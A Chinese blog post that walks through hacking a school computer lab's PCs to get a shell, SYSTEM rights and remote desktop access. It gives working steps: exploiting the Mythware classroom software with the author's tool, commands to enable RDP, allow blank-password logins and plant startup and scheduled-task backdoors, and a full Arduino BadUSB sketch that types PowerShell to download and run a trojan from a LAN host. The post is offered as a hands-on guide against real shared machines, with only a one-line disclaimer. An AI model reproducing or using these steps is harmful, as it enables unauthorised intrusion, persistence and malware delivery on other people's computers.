首页 > 其他分享 >学校机房渗透测试实战

学校机房渗透测试实战

时间:2024-05-28 15:01:36浏览次数:12  
标签:实战 RETURN 渗透 delay 按下 机房 KEY Keyboard 回车键

如何黑掉机房任意电脑?

ps:老师讲课太无聊了,写一下机房渗透测试的几种思路,并进行实战演示。有什么问题,可以留言,欢迎各位大佬来指正。

实现目标:

  1. 获取shell
  2. 获取system权限
  3. 建立远程桌面连接

思路一:找系统漏洞

1、用cmd命令查看系统版本:winver

发现系统版本是win10的21H2,找一下有没有相关的RCE(远程命令执行)漏洞。

由于我们学校机房系统版本较新,暂时没发现有可以直接利用的RCE漏洞。

如果系统为win10的1903或者1909版本,可能存在“永恒之黑漏洞” CVE-2020-0796。

这是一个远程命令执行漏洞,可以通过该漏洞直接获取system权限。

或者自己可以搜一下目标机系统有没有CVE漏洞,找Poc进行利用攻击。

参考:【漏洞复现】CVE-2020-0796永恒之黑漏洞复现_cve-2020-0796复现-CSDN博客

思路二:找系统中的软件漏洞

1、查看一下系统的教学软件。

发现使用的是极域的2016版本

那么接下来就好办了,该软件的学生端存在一个RCE漏洞,通过这个漏洞可以让学生端执行任意的cmd命令。

2、利用极域漏洞进行攻击


基于该漏洞我用python写了一个图形化的利用工具,可以直接向目标机上传指定的文件运行。

如果你的极域版本是极域2022也可以使用该软件进行攻击。

该软件已开源,GitHub:xxue888/fanjiyu-3.0: X反极域工具3.0 (github.com)

将自己的木马放到C盘,选择木马文件,进行上传。

MSF或CS的使用这里就不多讲了,自己搜着看吧,如果目标系统上有杀毒软件,要对木马做一个免杀处理。(可以使用RC4对称加密对shellcode进行加密处理)

msf监听:

上传木马文件:

目标上线:

使用CS连接也可以

3、msf后渗透

提权:getsystem

进入shell、解决乱码 chcp 65001

开启远程桌面
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

解除空密码登录限制
reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa" /v LimitBlankPasswordUse /t reg_dword /d 0 /f

进行远程连接:win+r 输入mstsc

学校机房一般都不设置密码,如果有密码,可以使用mimikatz来获取密码。

后门创建(cmd命令)

1、将木马加入启动文件夹

move "C:\server\x.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\"

2、创建登录计划任务

schtasks /create /sc onlogon /tn "server" /tr "C:\server\x.exe" /f

这里要注意你使用的木马路径。

思路三:物理攻击(制作badusb)

        向目标机插入特征usb,自动下载木马并打开,一般需要一个服务器来下载你的木马。

感兴趣的话可以在淘宝买一个badusb,通过Arduino IDE 进行烧录,这里自己研究怎么烧录吧。

可以参考下方文章研究学习。

以下是我烧录使用的代码:

#include<Keyboard.h>
void setup() {
// put your setup code here, to run once:
Keyboard.begin();//开始键盘通讯
delay(500);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press('r');//r键
delay(300);
Keyboard.release(KEY_LEFT_GUI);//释放win 键
Keyboard.release('r');//释放R键
//Keyboard.press(KEY_CAPS_LOCK);//切换大小写,绕过输入法
//Keyboard.release(KEY_CAPS_LOCK);
Keyboard.println("cmd ");
delay(300);
Keyboard.release(KEY_RETURN);//按下回车键
delay(1000);
Keyboard.println("powershell ");
Keyboard.press(KEY_RETURN);//按下回车键
delay(200);
Keyboard.release(KEY_RETURN);//按下回车键
delay(250);
Keyboard.println("$clnt = new-object System.Net.WebClient; ");
Keyboard.press(KEY_RETURN);//按下回车键
delay(200);
Keyboard.release(KEY_RETURN);//按下回车键
delay(250);
Keyboard.println("$url= 'http://192.168.1.102/x.exe'; ");
Keyboard.press(KEY_RETURN);//按下回车键
delay(200);
Keyboard.release(KEY_RETURN);//按下回车键
delay(250);
Keyboard.println("mkdir C:\\server ");
Keyboard.press(KEY_RETURN);//按下回车键
delay(200);
Keyboard.release(KEY_RETURN);//按下回车键
delay(250);
Keyboard.println("$file = 'C:\\server\\server.exe'; ");
Keyboard.press(KEY_RETURN);//按下回车键
delay(200);
Keyboard.release(KEY_RETURN);//按下回车键
delay(500);
Keyboard.println("$clnt.DownloadFile($url,$file); ");
Keyboard.press(KEY_RETURN);//按下回车键
delay(200);
Keyboard.release(KEY_RETURN);//按下回车键
delay(500);
Keyboard.println("START C:\\server\\server.exe ");
Keyboard.press(KEY_RETURN);
delay(250);
Keyboard.release(KEY_RETURN);
delay(250);
Keyboard.println("exit");
Keyboard.press(KEY_RETURN);//按下回车键
delay(200);
Keyboard.release(KEY_RETURN);//按下回车键
delay(250);
Keyboard.println("exit");
Keyboard.press(KEY_RETURN);//按下回车键
delay(200);
Keyboard.release(KEY_RETURN);//按下回车键
delay(250);

Keyboard.end();//结束键盘通讯
}

void loop() {
// put your main code here, to run repeatedly:

}

参考文章:

Badusb制作及使用(渗透windows)-CSDN博客

BadUSB超详细制作, 实现CobaltStrike远控上线 - 亨利其实很坏 - 博客园 (cnblogs.com)

目标主机上线后,使用前面的方法进行后渗透即可。

注:本文章仅限于安全研究,切勿非法利用,一切后果由本人承担。

标签:实战,RETURN,渗透,delay,按下,机房,KEY,Keyboard,回车键
From: https://blog.csdn.net/hg885210/article/details/139258952

相关文章

  • 国际版Tiktok抖音运营流量实战班:账号定位/作品发布/热门推送/等等-13节
    TikTok运营实战:从账号定位到发现上升趋势的全面指南这是一个快速了解TikTok运营的全面指南,无论你是新手还是想要提升你的TikTok战略的老手,这里都有你需要的信息。首先,我们要讲的是“TikTok账号定位”。这是你在TikTok成功的第一步,你需要明确你的目标受众,为他们提供他们感......
  • Go实战全家桶之九:统一网关
    开源:https://gitee.com/ichub/gocenter.git代码:配置:gateway:bypass:-path:/goauth/login-path:/goauth/logoutroutes:-path:/datadictserviceId:web.platform.com-path:/deptempserviceId:web.platform.com-p......
  • LLM 大模型学习必知必会系列(七):掌握分布式训练与LoRA/LISA微调:打造高性能大模型的秘
    LLM大模型学习必知必会系列(七):掌握分布式训练与LoRA/LISA微调:打造高性能大模型的秘诀进阶实战指南1.微调(SupervisedFinetuning)指令微调阶段使用了已标注数据。这个阶段训练的数据集数量不会像预训练阶段那么大,最多可以达到几千万条,最少可以达到几百条到几千条。指令微调可以......
  • Python数据分析与挖掘实战(5章)
    非原创,仅个人关于《Python数据分析与挖掘实战》的学习笔记5挖掘建模importwarningsimportmatplotlib.pyplotaspltimportnumpyasnpimportpandasaspd#解决中文乱码plt.rcParams['font.sans-serif']=['SimHei']plt.rcParams['axes.unicode_minus']=False#......
  • SpringSecurity实战!(前后端分离)
     前言SpringSecurity是Spring家族中的一个安全管理框架。相比与另外一个安全框架 Shiro,它提供了更丰富的功能,社区资源也比Shiro丰富。一般来说中大型的项目都是使用SpringSecurity来做安全框架。小项目有Shiro的比较多,因为相比与SpringSecurity,Shiro的上手更......
  • 【秒杀系统】秒杀系统实战(四):缓存与数据库双写一致性深度分析
    【秒杀系统】秒杀系统实战(四):缓存与数据库双写一致性深度分析前言微笑挖坑,努力填坑。————已经拥有黑眼圈,但还没学会小猪老师时间管理学的蛮三刀同学本文是秒杀系统的第四篇,我们来讨论秒杀系统中缓存热点数据的问题,进一步延伸到数据库和缓存的双写一致性问题,并且给......
  • Vue+OpenLayers7入门到实战:OpenLayers实现在地图上拖拽编辑修改绘制图形
    返回《Vue+OpenLayers7》专栏目录:Vue+OpenLayers7入门到实战前言本章介绍如何使用OpenLayers7在地图上拖拽编辑修改绘制图形。在前面一章中,我们已经学会了如何绘制基础的三种图形线段、圆形和多边形:《Vue+OpenLayers7入门到实战:OpenLayers图形绘制功能,OpenLayers实现在地......
  • Django框架前后端通信打通实战(PyCharm高级版)
    1.创建django项目并做好相关配置首先在pycharm高级版中创建django项目(1)选择左上角的四条小横线,然后找到文件下面的新建项目并点击,如下图:(2)点击完上图的新建项目之后,来到下面的页面. 然后点击左上角的Django,然后设置文件的位置,之后将模版文件夹的template这个单......
  • Http 代理工具 实战 支持网页与QQ代理
    前言:有些公司不让员工上Q或封掉某些网站,这时候,干着急没办法,只能鄱墙。如果上网搜代理IP,很少能用,用HTTP-Tunnel Client代理软件,免费的也是经常性的掉线。正好手头上有N台服务器,如果直接在上面装个CCProxy,也显的太明显了。于是自己写个代理软件放上去,一来包装一下好伪装,二来又有......
  • 鸿蒙HarmonyOS实战-Stage模型(线程模型)
    ......